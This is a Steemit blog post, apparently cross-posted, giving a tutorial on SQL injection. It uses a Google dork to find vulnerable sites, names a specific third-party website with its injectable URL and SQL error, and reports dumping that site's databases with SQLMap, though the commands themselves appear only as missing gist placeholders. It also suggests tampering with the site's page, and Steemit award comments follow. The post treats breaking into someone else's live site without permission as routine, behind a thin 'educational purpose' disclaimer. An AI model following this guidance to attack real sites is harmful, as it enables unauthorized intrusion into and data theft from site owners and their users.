Hack remote databases using SQL injection

in steempress •  6 years ago 


What is SQL Injection


 

SQL injection is a technique of injecting malicious SQL queries in query string of a website vulnerable to SQL injection. Using SQL injection, one can take over a vulnerable website by getting access to all data, deface a website, tamper existing website data and a lot more. SQL injection attacks are extremely dangerous and vulnerable websites are at high risk of leaking confidential data which might affect them as well as all it's stake holders.

In this blog, I will show you how to find out a website vulnerable to SQL injection and thereby exploit the vulnerability using a tool called SQLMap

 

We are going to use google dorks to find out a vulnerable website. If you don't know what are google dorks, please read my previous blog here

 

Let's use a simple google dork to find out vulnerable SQLi site as below:-

inurl:index.php?id=

The above will return a large number of search results all of which aren't obviously vulnerable but certainly are a good candidate for SQL injection attacks if they do not sanitize the query string properly and thus execute the injected SQL query.

 

Quick check to find SQL injection vulnerability


 

Out of the search results , returned by the above google search, I spotted a website karaoke.co.nz, vulnerable to SQL injection. Visiting the URL, http://karaoke.co.nz/items/index.php?id=37 and then appending a single quote at the end of this URL, shows that it's not able to sanitize query strings properly. Check this URL:-

http://karaoke.co.nz/items/index.php?id=37' which gives the below error:-

 

Unable to query local database to select IdentifierYou have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
select * from Category where Identifier = 37'

 

Below is a partial dump of one of the DB tables of this site:-

 

 

SQLMAP DUMP

 

 

 

 

To use SQLMap, download and install python first from here. Once done, download and install SQLMap from here

Once installed , go to the location where sqlmap is installed and type the below command to get familiarized with SQLMap

 

[gistpen id="1962"]

 

 

 

 

 

 

 

 

Use the below SQLMap commands to dump all the databases of the vulnerable site

[gistpen id="1925"]
The above will return database names. claireg_karaoke and information_schema in this case.
Use the below commands to get list of tables and other diagnostic data out of those databases.
[gistpen id="1927"]
[gistpen id="1929"]
Once we have table names, let's get the column names using below commands:-

[gistpen id="1931"]

 

 

[gistpen id="1933"]
The above commands "sqlmap-4" & "sqlmap-5" will return columns of the table specified by <table name>. Once we have all the info dumped, we can use it in whatever way we need.

Once you have the column names, you can dump their values using the below commands

 

[gistpen id="1955"]
It's also possible to dump the entire database using the option --dump-all

 

What more can be done to exploit this vulnerability ? Let's try to manipulate the query string and change the html webpage
 
Since, the website is not able to sanitize the query string, we can insert an image in the HTML page by tampering the query string. The below link shows the exploit
 
 
Happy hacking !!
 
Disclaimer:- The content is for educational purpose only. Any unethical usage of the info on this website is not my responsibility.
 
Like us at GolibraryIndia to get regular updates.
 
Posted from my blog with SteemPress : http://www.golibrary.co/hack-remote-databases-using-sql-injection/
steempress steem golibrary technology cybersecurity
6 years ago by

Downvoting a post can decrease pending rewards and make it less visible. Common reasons:

  • Disagreement on rewards
  • Fraud or plagiarism
  • Hate speech or trolling
  • Miscategorized content or spam

Submit
$0.00
    4 votes
    2
    Authors get paid when people like you upvote their post.
    If you enjoyed what you read here, create your account today and start earning FREE STEEM!
    Sort Order:  
  • Trending
    • [-]
      ·  6 years ago 

    Congratulations @golibrary! You received a personal award!

    1 Year on Steemit

    Click here to view your Board

    Do not miss the last post from @steemitboard:

    Christmas Challenge - The party continues

    Support SteemitBoard's project! Vote for its witness and get one more award!

    Downvoting a post can decrease pending rewards and make it less visible. Common reasons:

    • Disagreement on rewards
    • Fraud or plagiarism
    • Hate speech or trolling
    • Miscategorized content or spam

    Submit
    $0.00
      [-]
        ·  5 years ago 

      Congratulations @golibrary! You received a personal award!

      Happy Birthday! - You are on the Steem blockchain for 2 years!

      You can view your badges on your Steem Board and compare to others on the Steem Ranking

      Vote for @Steemitboard as a witness to get one more award and increased upvotes!

      Downvoting a post can decrease pending rewards and make it less visible. Common reasons:

      • Disagreement on rewards
      • Fraud or plagiarism
      • Hate speech or trolling
      • Miscategorized content or spam

      Submit
      $0.00